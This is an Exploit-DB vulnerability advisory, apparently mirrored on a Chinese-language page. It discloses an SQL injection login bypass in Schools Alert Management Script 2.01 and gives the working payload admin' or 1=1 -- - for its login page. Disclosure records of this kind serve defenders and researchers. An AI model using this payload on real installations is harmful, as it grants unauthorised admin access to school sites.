Schools Alert Management Script – Authentication Bypass

• Exploit Database
• 34 阅读

• 作者： Ali BawazeEer
  日期： 2017-08-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42578/

• # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
  
  <!-- 
  # Exploit Title:Schools Alert Management - SQL injection login bypass 
  # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
  # Dork: N/A
  # Date: 28.08.2017
  # Vendor Homepage: http://www.phpscriptsmall.com/product/schools-alert-management-system/
  # Version: 2.01
  # Category: Webapps
  # Tested on: windows64bit / mozila firefox 
  # 
  #
  --!>
  
  # ========================================================
  #
  #
  # Schools Alert Management - SQL injection login bypass 
  # 
  # Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school
  # 
  # Proof of Concept : - 
  # 
  # http://localhost/schoolalert/demo_school_name/schools_login.php[ set username and password ] to >>admin' or 1=1 -- - 
  #you must choose the check box as management 
  # 
  # 
  # 
  #
  # Risk : authenticated attacker maybe starting posting item in the site or compromise the site 
  #
  #
  # ========================================================
  # [+] Disclaimer
  #
  # Permission is hereby granted for the redistribution of this advisory,
  # provided that it is not altered except by reformatting it, and that due
  # credit is given. Permission is explicitly given for insertion in
  # vulnerability databases and similar, provided that due credit is given to
  # the author. The author is not responsible for any misuse of the information contained 
  # herein and prohibits any malicious use of all security related information
  # or exploits by the author or elsewhere.
  #
  #
  # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #